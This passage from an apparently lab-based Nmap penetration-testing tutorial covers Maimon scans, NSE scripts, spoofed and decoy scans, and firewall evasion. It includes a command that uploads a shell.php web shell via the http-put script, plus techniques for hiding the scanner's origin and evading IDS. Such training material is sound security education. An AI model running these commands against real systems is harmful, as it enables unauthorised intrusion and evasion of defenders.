mechanism and the hacking mindset. To select this scan type, use the `-sM` option. + +Most target systems respond with an RST packet regardless of whether the TCP port is open. In such a case, we won’t be able to discover the open ports. The figure below shows the expected behaviour in the cases of both open and closed TCP ports. + +![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/8ca5e5e0f6e0a1843cebe11b5b0785b3.png) + +The console output below is an example of a TCP Maimon scan against a Linux server. As mentioned, because open ports and closed ports are behaving the same way, the Maimon scan could not discover any open ports on the target system. + +Pentester Terminal + +```shell-session +pentester@TryHackMe$ sudo nmap -sM 10.10.252.27 + +Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:36 BST +Nmap scan report for ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27) +Host is up (0.00095s latency). +All 1000 scanned ports on ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27) are closed +MAC Address: 02:45:BF:8A:2D:6B (Unknown) + +Nmap done: 1 IP address (1 host up) scanned in 1.61 seconds +``` + +This type of scan is not the first scan one would pick to discover a system; however, it is important to know about it as you don’t know when it could come in handy. + +## NSE Scripts + +The **N**map **S**cripting **E**ngine (NSE) is an incredibly powerful addition to Nmap, extending its functionality quite considerably. NSE Scripts are written in the _Lua_ programming language, and can be used to do a variety of things: from scanning for vulnerabilities, to automating exploits for them. The NSE is particularly useful for reconnaisance, however, it is well worth bearing in mind how extensive the script library is. + +There are many categories available. Some useful categories include: + +- `safe`:- Won't affect the target +- `intrusive`:- Not safe: likely to affect the target + +- `vuln`:- Scan for vulnerabilities +- `exploit`:- Attempt to exploit a vulnerability +- `auth`:- Attempt to bypass authentication for running services (e.g. Log into an FTP server anonymously) +- `brute`:- Attempt to bruteforce credentials for running services +- `discovery`:- Attempt to query running services for further information about the network (e.g. query an SNMP server). + +A more exhaustive list can be found [here](https://nmap.org/book/nse-usage.html). + +In the next task we'll look at how to interact with the NSE and make use of the scripts in these categories. + + + +In Task 3 we looked very briefly at the `--script` switch for activating NSE scripts from the `vuln` category using `--script=vuln`. It should come as no surprise that the other categories work in exactly the same way. If the command `--script=safe` is run, then any applicable safe scripts will be run against the target (Note: only scripts which target an active service will be activated). + + +To run a specific script, we would use `--script=` , e.g. `--script=http-fileupload-exploiter`. + +Multiple scripts can be run simultaneously in this fashion by separating them by a comma. For example: `--script=smb-enum-users,smb-enum-shares`. + +Some scripts require arguments (for example, credentials, if they're exploiting an authenticated vulnerability). These can be given with the `--script-args` Nmap switch. An example of this would be with the `http-put` script (used to upload files using the PUT method). This takes two arguments: the URL to upload the file to, and the file's location on disk.  For example: + +`nmap -p 80 --script http-put --script-args http-put.url='/dav/shell.php',http-put.file='./shell.php'` + +Note that the arguments are separated by commas, and connected to the corresponding script with periods (i.e.  `.`). + +A full list of scripts and their corresponding arguments (along with example use cases) can be found [here](https://nmap.org/nsedoc/). + + +Nmap scripts come with built-in help menus, which can be accessed using `nmap --script-help `. This tends not to be as extensive as in the link given above, however, it can still be useful when working locally. + + + +Ok, so we know how to use the scripts in Nmap, but we don't yet know how to _find_ these scripts. + +We have two options for this, which should ideally be used in conjunction with each other. The first is the page on the [Nmap website](https://nmap.org/nsedoc/) (mentioned in the previous task) which contains a list of all official scripts. The second is the local storage on your attacking machine. Nmap stores its scripts on Linux at `/usr/share/nmap/scripts`. All of the NSE scripts are stored in this directory by default -- this is where Nmap looks for scripts when you specify them. + +There are two ways to search for installed scripts. One is by using the `/usr/share/nmap/scripts/script.db` file. Despite the extension, this isn't actually a database so much as a formatted text file containing filenames and categories for each available script. + +![](https://i.imgur.com/aJdVSAP.png) + +Nmap uses this file to keep track of (and utilise) scripts for the scripting engine; however, we can also _grep_ through it to look for scripts. For example: `grep "ftp" /usr/share/nmap/scripts/script.db`. + +![](https://i.imgur.com/ijAhZsy.png) + +The second way to search for scripts is quite simply to use the `ls` command. For example, we could get the same results as in the previous screenshot by using `ls -l /usr/share/nmap/scripts/*ftp*`: + +![](https://i.imgur.com/7GV9Wzi.png) + +_Note the use of asterisks_ (`*`) _on either side of the search term_ + +The same techniques can also be used to search for categories of script. For example: +`grep "safe" /usr/share/nmap/scripts/script.db` + +![](https://i.imgur.com/352GgTj.png) + + +_Installing New Scripts_ + +We mentioned previously that the Nmap website contains a list of scripts, so, what happens if one of these is missing in the `scripts` directory locally? A standard `sudo apt update && sudo apt install nmap` should fix this; however, it's also possible to install the scripts manually by downloading the script from Nmap (`sudo wget -O /usr/share/nmap/scripts/.nse https://svn.nmap.org/nmap/scripts/.nse`). This must then be followed up with `nmap --script-updatedb`, which updates the `script.db` file to contain the newly downloaded script. + +It's worth noting that you would require the same "updatedb" command if you were to make your own NSE script and add it into Nmap -- a more than manageable task with some basic knowledge of Lua! + + +## Spoofing and Decoys + +In some network setups, you will be able to scan a target system using a spoofed IP address and even a spoofed MAC address. Such a scan is only beneficial in a situation where you can guarantee to capture the response. If you try to scan a target from some random network using a spoofed IP address, chances are you won’t have any response routed to you, and the scan results could be unreliable. + +The following figure shows the attacker launching the command `nmap -S SPOOFED_IP 10.10.254.161`. Consequently, Nmap will craft all the packets using the provided source IP address `SPOOFED_IP`. The target machine will respond to the incoming packets sending the replies to the destination IP address `SPOOFED_IP`. For this scan to work and give accurate results, the attacker needs to monitor the network traffic to analyze the replies. + +![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/45b982d501fd26deb2b381059b16f80c.png) + +In brief, scanning with a spoofed IP address is three steps: + +1. Attacker sends a packet with a spoofed source IP address to the target machine. +2. Target machine replies to the spoofed IP address as the destination. +3. Attacker captures the replies to figure out open ports. + +In general, you expect to specify the network interface using `-e` and to explicitly disable ping scan `-Pn`. Therefore, instead of `nmap -S SPOOFED_IP 10.10.254.161`, you will need to issue `nmap -e NET_INTERFACE -Pn -S SPOOFED_IP 10.10.254.161` to tell Nmap explicitly which network interface to use and not to expect to receive a ping reply. It is worth repeating that this scan will be useless if the attacker system cannot monitor the network for responses. + +When you are on the same subnet as the target machine, you would be able to spoof your MAC address as well. You can specify the source MAC address using `--spoof-mac SPOOFED_MAC`. This address spoofing is only possible if the attacker and the target machine are on the same Ethernet (802.3) network or same WiFi (802.11). + +Spoofing only works in a minimal number of cases where certain conditions are met. Therefore, the attacker might resort to using decoys to make it more challenging to be pinpointed. The concept is simple, make the scan appears to be coming from many IP addresses so that the attacker’s IP address would be lost among them. As we see in the figure below, the scan of the target machine will appear to be coming from 3 different sources, and consequently, the replies will go the decoys as well. + +![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/754fc455556a424ca83f512665beaf7d.png) + +You can launch a decoy scan by specifying a specific or random IP address after `-D`. For example, `nmap -D 10.10.0.1,10.10.0.2,ME 10.10.254.161` will make the scan of 10.10.254.161 appear as coming from the IP addresses 10.10.0.1, 10.10.0.2, and then `ME` to indicate that your IP address should appear in the third order. Another example command would be `nmap -D 10.10.0.1,10.10.0.2,RND,RND,ME 10.10.254.161`, where the third and fourth source IP addresses are assigned randomly, while the fifth source is going to be the attacker’s IP address. In other words, each time you execute the latter command, you would expect two new random IP addresses to be the third and fourth decoy sources. + +## Firewall Evasion + +#### Evasion + +We have already seen some techniques for bypassing firewalls (think stealth scans, along with NULL, FIN and Xmas scans); however, there is another very common firewall configuration which it's imperative we know how to bypass. + +Your typical Windows host will, with its default firewall, block all ICMP packets. This presents a problem: not only do we often use _ping_ to manually establish the activity of a target, Nmap does the same thing by default. This means that Nmap will register a host with this firewall configuration as dead and not bother scanning it at all. + +So, we need a way to get around this configuration. Fortunately Nmap provides an option for this: `-Pn`, which tells Nmap to not bother pinging the host before scanning it. This means that Nmap will always treat the target host(s) as being alive, effectively bypassing the ICMP block; however, it comes at the price of potentially taking a very long time to complete the scan (if the host really is dead then Nmap will still be checking and double checking every specified port). + +It's worth noting that if you're already directly on the local network, Nmap can also use ARP requests to determine host activity. + + +There are a variety of other switches which Nmap considers useful for firewall evasion. We will not go through these in detail, however, they can be found [here](https://nmap.org/book/man-bypass-firewalls-ids.html). + +The following switches are of particular note: + +- `-f`:- Used to fragment the packets (i.e. split them into smaller pieces) making it less likely that the packets will be detected by a firewall or IDS. +- An alternative to `-f`, but providing more control over the size of the packets: `--mtu `, accepts a maximum transmission unit size to use for the packets sent. This _must_ be a multiple of 8. +- `--scan-delay